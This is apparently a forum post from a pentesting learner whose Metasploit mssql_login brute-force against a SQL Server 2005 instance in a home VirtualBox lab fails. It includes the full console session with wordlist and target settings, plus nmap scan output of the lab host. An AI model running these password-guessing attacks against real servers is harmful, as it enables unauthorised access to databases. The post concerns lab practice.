Brute Forcing Ms Sql Server

[Skorpinok Rover]

Hello,

I have Backtrack 5R2 & Windows XP SP2 machine with Microsoft's SQL Server 2005 Express installed in virtual box, when i try to Brute Forcing MS SQL Server i get connection refused error, i tried many times to gain access but fails,

the firewall & AV are off, please suggest me how to solve this ? Great thanks in advance.

Regards.

msf auxiliary(mssql_ping) > use scanner/mssql/mssql_login

msf auxiliary(mssql_login) > show options

msf auxiliary(mssql_login) > set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt

PASS_FILE => /pentest/exploits/fasttrack/bin/dict/wordlist.txt

msf auxiliary(mssql_login) > set RHOSTS 192.168.56.102

RHOSTS => 192.168.56.102

msf auxiliary(mssql_login) > set THREADS 10

THREADS => 10

msf auxiliary(mssql_login) > set verbose false

verbose => false

msf auxiliary(mssql_login) > exploit

[*] 192.168.56.102:1433 - MSSQL - Starting authentication scanner.

[-] 192.168.56.102:1433 MSSQL - [00001/57048] - Bruteforce cancelled against this service. Enable verbose output for service-specific details.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(mssql_login) > set RHOSTS 192.168.56.102

RHOSTS => 192.168.56.102

msf auxiliary(mssql_login) > set THREADS 10

THREADS => 10

msf auxiliary(mssql_login) > set verbose true

verbose => true

msf auxiliary(mssql_login) > exploit

[*] 192.168.56.102:1433 - MSSQL - Starting authentication scanner.

[*] 192.168.56.102:1433 MSSQL - [00001/57048] - Trying username:'sa' with password:''

[-] 192.168.56.102:1433 MSSQL - [00001/57048] - connection failed

[-] 192.168.56.102:1433 MSSQL - [00001/57048] - Bruteforce cancelled against this service.

[*] Scanned 1 of 1 hosts (100% complete)

-------------------------------------------------------------------------------------------------------------------------------

nmap -sT -A -P0 192.168.56.102

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-13 18:23 GST

Nmap scan report for 192.168.56.102

Host is up (0.00056s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

3389/tcp open microsoft-rdp Microsoft Terminal Service

31337/tcp open Elite?Host script results:

|_nbstat: NetBIOS name: NAVYA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ef:19:f6 (Cadmus Computer Systems)

|_smbv2-enabled: Server doesn't support SMBv2 protocol

| smb-security-mode:

| Account that was used for smb scripts: guest

| User-level authentication

| SMB Security: Challenge/response passwords supported

|_ Message signing disabled (dangerous, but default)

| smb-os-discovery:

| OS: Windows XP (Windows 2000 LAN Manager)

| Computer name: navya

| NetBIOS computer name: NAVYA

| Workgroup: WORKGROUP

|_ System time: 2012-06-13 18:25:50 UTC-7

| ms-sql-info:

| Windows server name: NAVYA

| [192.168.56.102\SQLEXPRESS]

| Instance name: SQLEXPRESS

| Version: Microsoft SQL Server 2005 RTM

| Product: Microsoft SQL Server 2005

| Service pack level: RTM

| TCP port: 1433

|_ Clustered: No

TRACEROUTE

HOP RTT ADDRESS

1 0.56 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 128.57 seconds

root@bt:~# nmap -sU 192.168.56.102 -p1434

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-13 18:26 GST

Nmap scan report for 192.168.56.102

Host is up (0.0017s latency).

PORT STATE SERVICE

1434/udp open|filtered ms-sql-m

MAC Address: 08:00:27:EF:19:F6 (Cadmus Computer Systems)